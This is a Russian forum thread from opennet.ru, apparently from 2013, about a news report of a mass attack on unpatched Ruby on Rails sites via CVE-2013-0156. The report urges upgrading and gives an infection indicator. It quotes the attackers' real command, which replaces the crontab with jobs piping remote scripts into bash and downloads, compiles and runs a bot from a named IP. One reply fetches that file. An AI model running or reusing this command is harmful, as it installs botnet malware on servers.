форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

"Зафиксирована массовая атака на уязвимые версии Ruby on Rails"	+/–
Сообщение от opennews on 31-Май-13, 10:49
В Сети зафиксирована (http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/) массовая атака на сайты, использующие устаревшие выпуски фреймворка  Ruby on Rails, содержащие неисправленную уязвимость CVE-2013-0156 (https://www.opennet.ru/opennews/art.shtml?num=35792). Несмотря на то, что обновление  Ruby on Rails с исправлением уязвимости было представлено ещё в январе, остаётся достаточно много систем не установивших обновление и остающихся уязвимыми. Этим и воспользовались злоумышленники, намеренные сформировать новый ботнет на базе таких систем. После эксплуатации уязвимости на сервер устанавливается специальная вредоносная программа, принимающая управляющие команды через IRC (используется канал #rails на сервере cvv4you.ru). В списке процессов вредоносная программа выглядит как "-- bash". Загрузка вредоносного ПО активируется через Cron. После получения доступа к атакованной системе, на ней выполняется следующий код (загрузка и сборка приложения k.c): <font color="#461b7e"> crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k </font> Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены свежие выпуски фреймворка 3.2.13, 3.1.12 или 2.3.18. Проверить активность вредоносного приложения можно по наличию файла /tmp/tan.pid. URL: http://jarmoc.com/blog/2013/05/28/ror-cve-2013-0156-in-the-wild/ Новость: https://www.opennet.ru/opennews/art.shtml?num=37064
Ответить | Правка | Cообщить модератору

Сообщения по теме

[Сортировка по времени | RSS]

1. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
Сообщение от Анонимусссссс on 31-Май-13, 10:49
Ай, спасибо, добрый человек. *Убежал проверяться.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	17. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+3 +/–
	Сообщение от Аноним (??) on 31-Май-13, 15:13
	Не читаешь сесуриту рассылку и держишь компилятор на сервере? ай ай ай
	Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

	19. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–2 +/–
	Сообщение от Аноним (??) on 31-Май-13, 17:17
	"сесуриту" ?  А это в куда?
	Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

	23. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–1 +/–
	Сообщение от zombardeer on 31-Май-13, 21:19
	отсутствие компилятора на сервере... как элемент защиты. виндовсятник?
	Ответить | Правка | ^ к родителю #17 | Наверх | Cообщить модератору

	27. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Куяврик on 01-Июн-13, 14:47
	> отсутствие компилятора на сервере... как элемент защиты. виндовсятник? скорее убунтоид, если разница кого-то волнует
	Ответить | Правка | ^ к родителю #23 | Наверх | Cообщить модератору

2. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–11 +/–
Сообщение от Аноним (??) on 31-Май-13, 11:11
под_linux_нету_вирусов.jpg
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	3. "'Зафиксирована массовая атака на уязвимые версии Ruby on Rail.."	+4 +/–
	Сообщение от scorry (ok) on 31-Май-13, 11:18
	Ещё один из разряда «прочитал всё, не понял ни одной буквы».
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

	5. "'Зафиксирована массовая атака на уязвимые версии Ruby on Rail.."	+3 +/–
	Сообщение от ВовкаОсиист (ok) on 31-Май-13, 11:42
	Да тут врятли дальше заголовка пошло дело.
	Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

	10. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 31-Май-13, 13:12
	Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD и правда нету.
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

	21. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от XoRe (ok) on 31-Май-13, 18:06
	> Это ж не вирус :) Резидентный вирусов, как в винде, под Линукс/BSD > и правда нету. Вообще есть) Но они очень редки, в пересчете на количество пользователей/серверов. И чаще это руткиты.
	Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

	24. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 01-Июн-13, 09:49
	Определение вируса (заодним и других зловредов) хоть в Википедии прочитай и заучи наизусть как устав караульной службы, если суть запомнить не можешь. Может, тебе это поможет не позориться на компьютерных форумах.
	Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–1 +/–
Сообщение от тигар (ok) on 31-Май-13, 11:22
они поломали хетзнир? --2013-05-31 10:21:32--  http://88.198.20.247/k.c Connecting to 88.198.20.247:80... connected. HTTP request sent, awaiting response... и тишина...
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	8. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от xdsl on 31-Май-13, 12:55
	У тебя неправильный юзерагент
	Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

	9. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–1 +/–
	Сообщение от тигар (ok) on 31-Май-13, 12:59
	> У тебя неправильный юзерагент что-то я не заметил в том cronjob левого UA
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

	12. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 31-Май-13, 13:31
	User-Agent: Wget/1.13.4 (linux-gnu)
	Ответить | Правка | ^ к родителю #9 | Наверх | Cообщить модератору

	14. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–1 +/–
	Сообщение от тигар (ok) on 31-Май-13, 14:01
	[tiger@laptop]:~%wget --user-agent="Wget/1.13.4 (linux-gnu)" http://88.198.20.247/k.c --2013-05-31 13:00:31--  http://88.198.20.247/k.c HTTP request sent, awaiting response... 504 Gateway Time-out 2013-05-31 13:03:31 ERROR 504: Gateway Time-out.
	Ответить | Правка | ^ к родителю #12 | Наверх | Cообщить модератору

	16. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 31-Май-13, 15:02
	уже прикрыли хосты и айпи
	Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

	13. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 31-Май-13, 13:52
	ТолстОта
	Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

6. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	–2 +/–
Сообщение от ано2анон on 31-Май-13, 12:42
Что то по тенденции руби напоминает друшлак :D
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	11. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+6 +/–
	Сообщение от Аноним (??) on 31-Май-13, 13:18
	Как и всё, что админы поставили и оставили без внимания на длительное время.
	Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

	25. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 01-Июн-13, 09:51
	> Как и всё, что админы поставили и оставили без внимания на длительное > время. А если админа контрора берет только для внедрения, а потом фактически засылает его?
	Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

	18. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+2 +/–
	Сообщение от GentooBoy (ok) on 31-Май-13, 16:07
	причем тут руби? говориться про рельсы http://www.cvedetails.com/vulnerability-list/vendor_id-10199...
	Ответить | Правка | ^ к родителю #6 | Наверх | Cообщить модератору

	20. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от robux (ok) on 31-Май-13, 17:34
	Он не знает что такое руби. Да похоже и рельсы не знает что такое.
	Ответить | Правка | ^ к родителю #18 | Наверх | Cообщить модератору

7. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+2 +/–
Сообщение от Аноним (??) on 31-Май-13, 12:50
>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены gcc
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

	26. "Зафиксирована массовая атака на уязвимые версии Ruby on Rail..."	+/–
	Сообщение от Аноним (??) on 01-Июн-13, 09:53
	>>Всем пользователям Ruby on Rails рекомендуется убедиться, что на их серверах установлены > gcc Прикинь, если выставленные наружу виндовые сервера (нам пытались такую технологию впарить). Такому серверу ничто не угрожает ... минут 15. Потом пипец.
	Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

28. "Зафиксирована массовая атака на уязвимые версии Ruby on Rails"	+/–
Сообщение от бедный буратино (ok) on 01-Июн-13, 16:58
https://jira.mongodb.org/browse/PYTHON-532
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема